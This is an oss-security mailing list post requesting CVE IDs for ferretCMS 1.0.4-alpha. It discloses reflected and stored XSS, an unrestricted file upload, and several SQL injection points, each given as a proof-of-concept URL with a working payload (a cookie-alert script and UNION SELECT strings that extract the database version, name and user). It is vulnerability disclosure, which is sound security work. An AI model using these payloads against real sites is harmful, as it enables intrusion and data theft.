Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Fri, 23 Jan 2015 07:14:56 +0100
From: Steffen Rösemann <steffen.roesemann1986@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE-Request -- ferretCMS v.1.0.4-alpha -- Multiple reflecting/stored
 XSS- and SQLi-vulnerabilities, unrestricted file upload

Hi Josh, Steve, vendors, list.

I found multiple reflecting/stored XSS- and SQLi-vulnerabilities as well as
an unrestricted file upload in the CMS ferretCMS v.1.0.4 which is currently
in the alpha development stage.

============
Reflecting XSS
============

http://
{TARGET}/admin.php?type=search&action=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

============
Stored XSS
============

1.
via login-form of the administrative backend, input field for username:

http://{TARGET}/admin.php

executed here in the logevent functionality in the backend:

http://{TARGET}/admin.php?type=log&action=read

2.

via the new blog-post form, input field for pagetitle:

http://{TARGET}/admin.php?type=page&action=insert&p=

executed, for example, here:

http://{TARGET}/admin.php?type=page&action=read

============
SQLi
============

http://
{TARGET}/admin.php?type=site&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+

http://
{TARGET}/admin.php?type=customkey&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,4+--+

http://
{TARGET}/admin.php?type=account&action=update&p=1+and+1=2+union+select+1,database%28%29,3,4,5,version%28%29,7,8,9+--+

http://
{TARGET}/admin.php?type=plugin&action=update&p=1+and+1=2+union+select+1,database%28%29,version%28%29,4+--+

http://
{TARGET}/admin.php?type=template&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,user%28%29,5+--+

http://
{TARGET}/admin.php?type=permissiongroup&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+

http://
{TARGET}/admin.php?type=page&action=update&p=1+and+substring%28version%28%29,1,1%29=5+--+

==================
Unrestricted file upload
==================

An administrator has the opportunity to upload arbitrary files via a form
located here on a common ferretCMS installation:

http://{TARGET}/admin.php?type=uploader&action=upload

As these files aren't renamed and stored in the following location, any
unauthenticated user is able to read/execute those files, too:

http://{TARGET}/custom/uploads/{NAME_OF_THE_FILE}



Could you please assign a CVE-ID / CVE-IDs for these issues.

Thank you very much!

Greetings.

Steffen Rösemann

References:

[1] https://github.com/JRogaishio/ferretCMS
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-10.html
[3] https://github.com/JRogaishio/ferretCMS/issues/63
[4] https://github.com/sroesemann/ferretCMS
[5] http://seclists.org/fulldisclosure/2015/Jan/98
[6]
http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-10.html

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.